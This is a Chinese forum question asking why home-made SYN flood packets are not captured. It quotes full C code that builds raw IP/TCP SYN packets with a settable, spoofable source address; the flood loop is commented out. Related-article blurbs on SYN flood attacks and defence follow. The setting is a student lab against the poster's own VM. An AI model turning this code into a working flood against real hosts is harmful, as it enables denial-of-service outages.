模拟syn flood sendto发送数据包

fanweiyang1 2014-04-17 04:34:36
如题 网上找了段代码 模拟syn flood 抓包抓到的全是udp包
发现里面封包的时候
ipHeader.proto=IPPROTO_UDP

若改成
ipHeader.proto=IPPROTO_TCP

则发送端和接收端都抓不到包 是何原因
win7发送 攻击 ubuntu虚拟机


而且 如果用虚假地址 同样两端都抓不到包 求分析原因






#include "stdafx.h"

#include <stdio.h>

#include <winsock2.h>

#include <ws2tcpip.h>

#include <time.h>

#include <windows.h>

#include <string.h>

#include <stdlib.h>

//#include <iostream.h>

#pragma comment(lib,"ws2_32.lib")

 

#define IPVER   4           //IP协议预定

#define MAX_BUFF_LEN 65500  //发送缓冲区最大值

 

typedef struct ip_hdr    //定义IP首部

{

UCHAR h_verlen;            //4位首部长度,4位IP版本号

UCHAR tos;                //8位服务类型TOS

USHORT total_len;        //16位总长度(字节)

USHORT ident;            //16位标识

USHORT frag_and_flags;    //3位标志位

UCHAR ttl;                //8位生存时间 TTL

UCHAR proto;            //8位协议 (TCP, UDP 或其他)

USHORT checksum;        //16位IP首部校验和

ULONG sourceIP;            //32位源IP地址

ULONG destIP;            //32位目的IP地址

}IP_HEADER;

 

typedef struct tsd_hdr //定义TCP伪首部

{

ULONG saddr;    //源地址

ULONG daddr;    //目的地址

UCHAR mbz;        //没用

UCHAR ptcl;        //协议类型

USHORT tcpl;    //TCP长度

}PSD_HEADER;

 

typedef struct tcp_hdr //定义TCP首部

{

USHORT th_sport;            //16位源端口

USHORT th_dport;            //16位目的端口

ULONG th_seq;                //32位序列号

ULONG th_ack;                //32位确认号

UCHAR th_lenres;            //4位首部长度/6位保留字

UCHAR th_flag;                //6位标志位

USHORT th_win;                //16位窗口大小

USHORT th_sum;                //16位校验和

USHORT th_urp;                //16位紧急数据偏移量

}TCP_HEADER;

 

//CheckSum:计算校验和的子函数

USHORT checksum(USHORT *buffer, int size)

{

    unsigned long cksum=0;

    while(size >1)

    {

        cksum+=*buffer++;

        size -=sizeof(USHORT);

    }

    if(size)

    {

        cksum += *(UCHAR*)buffer;

    }

 

    cksum = (cksum >> 16) + (cksum & 0xffff);

    cksum += (cksum >>16);

    return (USHORT)(~cksum);

}

 

int main(int argc, char* argv[])

{

    WSADATA WSAData;

    SOCKET sock;

   

    IP_HEADER ipHeader;

    TCP_HEADER tcpHeader;

    PSD_HEADER psdHeader;

 

    char Sendto_Buff[MAX_BUFF_LEN];  //发送缓冲区

    unsigned short check_Buff[MAX_BUFF_LEN]; //检验和缓冲区

    const char tcp_send_data[]={"This is my homework of networt,I am happy!"};

 

    BOOL flag;

    int rect,nTimeOver;

 

   /* if (argc!= 5)

    {

        printf("Useage: SendTcp soruce_ip source_port dest_ip dest_port \n");

        return false;

    }*/

	argv[1]="192.168.202.1";

	argv[3]="192.168.202.130";

	argv[2]="12346";

	argv[4]="12346";



 

    if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

    {

        printf("WSAStartup Error!\n");

        return false;

    }

if((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,

WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)

    {

        printf("Socket Setup Error!\n");

        return false;

    }

    flag=true;

    if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==

SOCKET_ERROR)

    {

        printf("setsockopt IP_HDRINCL error!\n");

        return false;

    }

    nTimeOver=1000;

    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)

    {

        printf("setsockopt SO_SNDTIMEO error!\n");

        return false;

    }

 

    //填充IP首部

    ipHeader.h_verlen=(IPVER<<4 | sizeof(ipHeader)/sizeof(unsigned long));

    ipHeader.tos=(UCHAR)0;

    ipHeader.total_len=htons((unsigned short)sizeof(ipHeader)+sizeof(tcpHeader)+sizeof(tcp_send_data));

    ipHeader.ident=0;       //16位标识

    ipHeader.frag_and_flags=0; //3位标志位

    ipHeader.ttl=128; //8位生存时间

    ipHeader.proto=IPPROTO_UDP; //协议类型

    ipHeader.checksum=0; //检验和暂时为0

    ipHeader.sourceIP=inet_addr(argv[1]);  //32位源IP地址

    ipHeader.destIP=inet_addr(argv[3]);    //32位目的IP地址

 

    //计算IP头部检验和

    memset(check_Buff,0,MAX_BUFF_LEN);

    memcpy(check_Buff,&ipHeader,sizeof(IP_HEADER));

    ipHeader.checksum=checksum(check_Buff,sizeof(IP_HEADER));

 

    //构造TCP伪首部

    psdHeader.saddr=ipHeader.sourceIP;

    psdHeader.daddr=ipHeader.destIP;

    psdHeader.mbz=0;

    psdHeader.ptcl=ipHeader.proto;

    psdHeader.tcpl=htons(sizeof(TCP_HEADER)+sizeof(tcp_send_data));

 

    //填充TCP首部

    tcpHeader.th_dport=htons(atoi(argv[4])); //16位目的端口号

    tcpHeader.th_sport=htons(atoi(argv[2])); //16位源端口号

    tcpHeader.th_seq=0;                         //SYN序列号

    tcpHeader.th_ack=0;                         //ACK序列号置为0

    //TCP长度和保留位

    tcpHeader.th_lenres=(sizeof(tcpHeader)/sizeof(unsigned long)<<4|0);

    tcpHeader.th_flag=2; //修改这里来实现不同的标志位探测,2是SYN,1是//FIN,16是ACK探测 等等

    tcpHeader.th_win=htons((unsigned short)16384);     //窗口大小

    tcpHeader.th_urp=0;                            //偏移大小   

    tcpHeader.th_sum=0;                            //检验和暂时填为0

   

    //计算TCP校验和

    memset(check_Buff,0,MAX_BUFF_LEN);

    memcpy(check_Buff,&psdHeader,sizeof(psdHeader));

    memcpy(check_Buff+sizeof(psdHeader),&tcpHeader,sizeof(tcpHeader));

    memcpy(check_Buff+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),tcp_send_data,sizeof(tcp_send_data));

    tcpHeader.th_sum=checksum(check_Buff,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(tcp_send_data));

 

    //填充发送缓冲区

    memset(Sendto_Buff,0,MAX_BUFF_LEN);

    memcpy(Sendto_Buff,&ipHeader,sizeof(IP_HEADER));

	memcpy(Sendto_Buff+sizeof(IP_HEADER),&tcpHeader,sizeof(TCP_HEADER));

    

//	memcpy(Sendto_Buff+sizeof(IP_HEADER)+sizeof(TCP_HEADER),tcp_send_data,sizeof(tcp_send_data));

    int datasize=sizeof(IP_HEADER)+sizeof(TCP_HEADER);//+sizeof(tcp_send_data);

    //发送数据报的目的地址

    SOCKADDR_IN dest;   

    memset(&dest,0,sizeof(dest));

    dest.sin_family=AF_INET;

    dest.sin_addr.s_addr=inet_addr(argv[3]);

    dest.sin_port=htons(atoi(argv[4]));



//	while(1)

//	{

		rect=sendto(sock,Sendto_Buff,datasize, 0,(struct sockaddr*)&dest, sizeof(dest));

//	}

	

	if (rect==SOCKET_ERROR)

   { 

      printf("send error!:%d\n",WSAGetLastError());

      return false;

    }

    else

    printf("send ok!\n");

    closesocket(sock);

    WSACleanup();

    return 1;

}
...全文
217 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
计算机网络 传输层 TCP和UDP协议
Re: 计算机网络 传输层 TCP和UDP协议# 传输层协议 TCP 和 UDP 的应用场景 要发送的内容多,需要将发送的内容分成多个数据包发送(TCP) 要发送的内容少,一个数据包就能发送全部内容(UDP)# 传输层协议和应用层协议之间的关系 传输层协议加一个端口号来标识一个应用层协议, 展示了传输层协议和应用层协议之间的关系# 使用TCP/IP筛选实现网络安全 防火墙设置与端口# UDP协议特点和报文格式UDP是无连接的:即发送数据之前不需要建立连接UDP使用尽最大努力交付:即不保证可靠交付,因此主机不需要维持复杂的连接状态表# TCP 协议特点和报文格式先连接后释放;点对点;可靠传输;全双工通信;面向数据流七项标记位停止等待协议与改进的停止等待协议滑动窗口技术详解:确认Seq与选择确认SACK 超时重传时间:查询计算与自动调整 流量控制功能:点对点的流量控制  拥塞控制:相对整体网络环境而言;慢开始算法和拥塞避免算法 改进的拥塞控制:快重传和快恢复 三次握手建立TCP连接,四次挥手释放连接。# TCP 协议面临的攻击 SYN 攻击:捏造的源地址; LAND攻击:自己就是源地址# 通过抓包工具,查看以上报文格式# 习题详解  
使用Python实现的SynFlood DDoS攻击
TCP握手是建立TCP连接的过程,由三个步骤组成:客户端发送一个带有SYN标志的TCP数据包到服务器,服务器收到该数据包后回复一个带有SYN/ACK标志的数据包给客户端,最后客户端发送一个带有ACK标志的数据包给服务器,完成连接建立。这只是一个简单的SynFlood攻击脚本示例,实际的攻击可能需要更复杂的技术和方法。攻击者发送大量伪造的SYN数据包给目标服务器,在服务器回复SYN/ACK之前不再发送ACK数据包,从而导致服务器的资源被消耗殆尽。替换为目标服务器的端口号,然后设置攻击的持续时间。
用Python实现SynFlood攻击
SynFlood攻击是一种常见的DoS攻击,它利用TCP协议的漏洞向目标服务器发送大量伪造的TCP连接请求(SYN包),目标服务器无法处理这些请求导致服务瘫痪。在本文中,我们将使用Python编写一个简单的SynFlood程序,并对其进行讲解。其中,将SO_REUSEADDR选项设置为1可以允许多个socket绑定同一个地址和端口,这样我们就可以向同一个目标IP地址和端口发送大量的SYN包。这里我们假设我们的源IP地址为1.2.3.4,实际上可以使用任意不存在的IP地址。现在,我们可以开始发送SYN包了。
SYN Flood攻击的基本原理及防御
第一部分 SYN Flood的基本原理     SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。    要明白这种攻击的基本原理,还是要从TCP连接建立的过程开始说起: 大家都知道,TCP与UDP不同
【网络编程】SYN Flood (SYN洪水攻击) 源代码分析
一.原理1、TCP握手协议第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包
安全技术/病毒

9,506

社区成员

28,984

社区内容

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章